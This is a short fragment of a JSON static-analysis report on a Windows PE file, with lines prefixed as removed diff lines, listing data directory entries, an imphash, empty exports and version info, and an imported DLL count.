- "size": "0x000000e8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e4334085562a74ad98ab8806ba673ef",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 6,
- "versioninfo": []
- }
- }